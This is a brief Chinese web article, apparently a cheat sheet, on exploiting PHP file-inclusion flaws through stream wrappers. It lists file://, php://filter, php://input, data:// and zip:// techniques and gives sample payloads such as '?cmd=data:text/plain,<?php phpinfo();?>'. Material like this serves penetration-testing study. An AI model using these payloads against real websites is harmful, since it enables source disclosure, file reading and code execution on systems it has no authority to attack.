当前位置: 首页 > article >正文

文件包含漏洞PHP伪协议利用方法

使用file协议读取Windows的系统文件

使用php://filter协议可以将php代码进行base64编码后显示出来

php://input

抓包,并加上<?php phpinfo() ?>

data://

?cmd=data:text/plain,<?php%20phpinfo();?>

zip://

读取压缩包内的⽂件

?cmd=zip://d:/3.zip/3.txt


http://www.kler.cn/a/289449.html

相关文章:

  • 机器学习——贝叶斯
  • 系统架构设计师论文:大数据Lambda架构
  • ❤React-JSX语法认识和使用
  • Java程序中如何输入数据
  • Rust学习(二):rust基础语法Ⅰ
  • Mysql 8迁移到达梦DM8遇到的报错
  • Kaggle竞赛:Rossmann Store Sales第66名策略复现
  • Java后端面试题(微服务相关)(day12)
  • GPU环境配置:1.CUDA、Anaconda、Pytorch
  • 在Linux中使用MySQL基础SQL语句及校验规则
  • 振动分析-23-频域分析之深入理解幅值谱与相位谱的计算过程
  • 【ssh】如何远程连接
  • 小米电视使用adb 卸载自带应用教程
  • 每日刷题(图论)
  • 基于Android Studio的用户行程记录APK开发指南(一):项目基础配置与速通Kotlin
  • unreal engine骨骼绑定重定向实现自定义人物替换游戏中小白人,但是用小白人或者某超人现有的移动等功能再次折腾笔记...
  • 电脑连接公司服务器记住了账户密码,怎么换账户呢?
  • python实战三-提取Word数据到Excel
  • 《python语言程序设计》第8章第12题生物信息:找出基因,生物学家使用字母A C T和G构成字符2串建模一个基因组(下)
  • 【Linux系统编程】TCP实现--socket
  • 力扣2542.最大子序列的分数
  • 设计模式-离氏替换原则
  • Edge PDF 关闭 提供支持的应用Adobe Acrobat
  • 深度学习-OpenCv的运用(4)
  • 【安全生产】叉车安全带报警器有哪些特点?
  • 数分基础(06)商业分析四种类型简介